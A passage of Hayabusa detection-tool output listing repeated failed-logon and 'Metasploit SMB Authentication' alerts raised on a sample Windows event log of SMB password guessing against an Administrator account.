Password,User: Administrator : Type: 3 : Workstation: ZLO4cufbFcRhRy8b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.173 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.215 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a845OfrFKxy31Yhg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.215 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QnPM7uhs8y4BaP6I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7fW5FzQ4jbWDJxXc : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: huKy3ruTPAlx94pI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.326 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g78Kx7hkMuUGIoX1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.363 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: erSXtXvMi8Cg1PWw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VaqXgO2US87zoXLl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.462 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QHEfAfFuAR2pX3LO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.501 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4Owk2elGaC5DOm1U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.543 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: VXPynWzVNADN56a4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xwfwZ0hXFaFwqymH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.619 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QYlZwLsvrsuqUZ4q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pvGrzr30eVl5TGhA : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.707 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.791 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tqdJcHWbdGcIIHBr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.791 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YDt69bIJ1yI6PXLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.840 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WtE2uMuOe8QPAKOj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.879 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BWQDlZDgFj9NmMhJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.911 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ncQiyLyHCXr8knGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.964 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XjVmLfmcPMYbmdin : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.021 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: gU2HjzjDxHsnvENI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.072 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.103 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cUPn5CEz2LtwRwvZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.103 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hCz069oBFXqpshbU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.140 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.187 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dzhc9PVRVP69tshD : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.187 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.226 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ejA3ZNfKWEs8zAMX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.226 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.265 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U5egiL2PGOrYCHv5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.265 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YYhIM3zla6KcbKbM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.302 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WjyQJnVBO4iC9Tkw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g6Tpp8TRa2nRxHzo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.387 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DyLvo5Bn2HzyANdH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.422 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: NaXNThuZDGqJ7oCP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.465 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 42Sb7p19cQsEV30b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.505 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: An6629wgflzSgqY5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.540 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iO7JktEihqddmEtv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.584 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nG97BFOgKxnZaqi4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SH2D24c6nRGDL4Oe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uiu2yfaM2JQQZoLF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YQx9PG8DtR2tMjvS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OoAWryajKhLD7RyY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.792 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PgewSeaVugP1TXss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.836 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: sPMCPdCAnz4upz8X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.911 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dUbV6xnGeBWE8Dif : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dIJ9mZczFO1GKItV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.001 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wW0vxE4o68L70Sra : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: upOn9DzB1yWtntyX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m9uGgocAVReiJWDm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qm9Jf1fles2HOb3g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.153 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
